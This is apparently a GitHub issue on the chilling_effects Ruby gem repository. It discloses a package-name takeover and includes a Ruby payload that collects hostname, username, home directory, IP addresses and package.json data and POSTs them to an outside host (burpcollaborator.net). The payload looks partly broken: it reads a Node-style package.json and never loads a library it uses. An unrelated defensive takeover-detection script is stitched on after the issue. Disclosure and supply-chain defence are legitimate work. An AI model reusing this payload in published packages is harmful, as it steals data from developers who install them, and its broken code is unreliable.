benbalter / chilling_effects

A Ruby gem to interact with the Chilling Effects API


Gem Package Takeover - `chilling effects`

ManojSharma1997 opened this issue · comments

Hello benbalter,

I am writing to bring to your attention a significant security concern regarding a RubyGems package that I have recently discovered. I believe it poses a potential threat to the security of its users.

I found that the chilling_effects RubyGems package is available for takeover. Hence I have taken over this RubyGems package.

Exploit

If the team allows I can upload the following malicious code.

```ruby
require 'net/http'
require 'json'
require 'os'
require 'socket'
require 'querystring'

packageJSON = JSON.parse(File.read('./package.json'))
package = packageJSON['name']

trackingData = {
  p: package,
  c: __dir__,
  hd: Dir.home,
  hn: Socket.gethostname,
  un: Etc.getlogin,
  dns: Socket.getaddrinfo(Socket.gethostname, nil, Socket::AF_INET).map { |addrinfo| addrinfo[3] },
  r: packageJSON ? packageJSON['__resolved'] : nil,
  v: packageJSON['version'],
  pjson: packageJSON
}

postData = Querystring.stringify(msg: trackingData.to_json)

url = URI.parse('https://burpcollaborator.net') # replace burpcollaborator.net with Interactsh or pipedream
http = Net::HTTP.new(url.host, url.port)
http.use_ssl = true

headers = {
  'Content-Type' => 'application/x-www-form-urlencoded',
  'Content-Length' => postData.length.to_s
}

response = http.post(url.path, postData, headers)
puts response.body
```

POC
https://rubygems.org/gems/chilling_effects

Impact

An attacker can take over the package, and when the developer tries this code, it will inject malicious code into their system by trusting chilling_effects.
This will lead to Remote Code Execution.

Best Regards,
@predator_97
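An added example, not part of the issue above and not code from the chilling_effects project: a Ruby heuristic that a maintainer or consumer can run before `bundle install` to flag a gem whose newest release looks like an abandoned-name takeover (long dormancy, changed author, owners nobody recognises). It runs on constructed JSON shaped like the public RubyGems `versions` and `owners` endpoints; the sample values, the thresholds and the `takeover_indicators` name are assumptions for this example.

```ruby
require 'json'
require 'time'

# Constructed sample data shaped like rubygems.org's
#   GET /api/v1/versions/<name>.json      (one entry per release)
#   GET /api/v1/gems/<name>/owners.json   (current owners)
# The values are made up for this example, not real data about chilling_effects.
VERSIONS_JSON = <<~JSON
  [
    {"number":"1.0.0","created_at":"2024-03-01T10:00:00.000Z","downloads_count":40,"authors":"someone-else"},
    {"number":"0.1.1","created_at":"2014-06-10T09:00:00.000Z","downloads_count":9000,"authors":"benbalter"},
    {"number":"0.1.0","created_at":"2014-05-02T09:00:00.000Z","downloads_count":7000,"authors":"benbalter"}
  ]
JSON
OWNERS_JSON = '[{"handle":"someone-else"}]'

# Returns human-readable reasons the newest release deserves manual review.
# An empty list means no heuristic fired; it is not proof the gem is safe.
def takeover_indicators(versions_json, owners_json, known_owners:, dormant_days: 365)
  versions = JSON.parse(versions_json).sort_by { |v| Time.iso8601(v['created_at']) }.reverse
  owners = JSON.parse(owners_json).map { |o| o['handle'] }
  reasons = []
  return reasons if versions.empty?

  newest, previous = versions[0], versions[1]
  if previous
    # 1. A release after years of silence is the classic abandoned-name pattern.
    gap_days = (Time.iso8601(newest['created_at']) - Time.iso8601(previous['created_at'])) / 86_400
    reasons << "released after #{gap_days.to_i} days of dormancy" if gap_days > dormant_days
    # 2. The author string changed between consecutive releases.
    if newest['authors'] != previous['authors']
      reasons << "authors changed from #{previous['authors'].inspect} to #{newest['authors'].inspect}"
    end
  end
  # 3. None of the current owners is one the project documents as legitimate.
  if (owners & known_owners).empty?
    reasons << "no current owner #{owners.inspect} matches known owners #{known_owners.inspect}"
  end
  reasons
end

if __FILE__ == $PROGRAM_NAME
  # The repository owner handle from the page is used as the known-good owner.
  puts takeover_indicators(VERSIONS_JSON, OWNERS_JSON, known_owners: ['benbalter'])
end
```

Pair the flagged gems with a pinned `Gemfile.lock` and checksum verification; the heuristic only decides which releases a human should look at first.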